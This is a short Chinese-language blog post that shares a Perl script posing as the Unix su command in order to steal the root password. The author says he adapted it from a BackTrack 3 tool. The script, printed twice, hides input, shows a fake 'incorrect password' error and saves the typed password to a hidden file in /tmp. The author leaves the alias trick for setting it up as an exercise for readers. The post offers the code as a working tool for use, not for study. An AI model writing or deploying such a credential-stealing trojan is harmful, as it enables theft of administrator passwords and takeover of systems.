冒充su ,perl寫的su.pl盜取root密碼
更新時間:2008年09月14日 08:16:59 作者:
backtrack3里面/pentest/housekeeping里面有個超囧的偷root密碼的東西,冒充su ,perl寫的,管理員輸入密碼的時候還直接回顯
我改了一下,把回顯關了 加了個延時:
#!/usr/bin/perl
# Written by xi4oyu <evil.xi4oyu@gmail.com>.
print "Password: ";
`stty -echo`;
$s1=<STDIN>;
print "\n";
`stty echo`;
sleep 3;
print "su: incorrect password\n";
chomp($s1);
$s2="Password is: ";
$s3=" ".`date +%Y-%m-%d`;
open (users, ">>/tmp/.pass") || die ;
print users ($s2, $s1,$s3);
close (users);
很明顯直接用是8行的,還有別名恢復等工作要做,各位看官自己搞定!
#!/usr/bin/perl
# Written by xi4oyu <evil.xi4oyu@gmail.com>.
print "Password: ";
`stty -echo`;
$s1=<STDIN>;
print "\n";
`stty echo`;
sleep 3;
print "su: incorrect password\n";
chomp($s1);
$s2="Password is: ";
$s3=" ".`date +%Y-%m-%d`;
open (users, ">>/tmp/.pass") || die ;
print users ($s2, $s1,$s3);
close (users);
很明顯直接用是8行的,還有別名恢復等工作要做,各位看官自己搞定!
相關文章
perl實現(xiàn)的兩個文件對比并對數(shù)據(jù)進行篩選的腳本代碼
對比兩個文件并對數(shù)據(jù)進行篩選的perl腳本,涉及到哈希的應用和perl編程風格的改變。有需要的朋友可以參考下2013-03-03
Perl Mysql數(shù)據(jù)庫操作實現(xiàn)代碼
對于perl操作mysql的步驟,說的比較詳細,建議大家好好看看,參考2009-01-01
perl中srand()與time的函數(shù)使用方法介紹
這篇文章主要介紹了perl中srand與time函數(shù)的使用,需要的朋友可以參考下2013-03-03

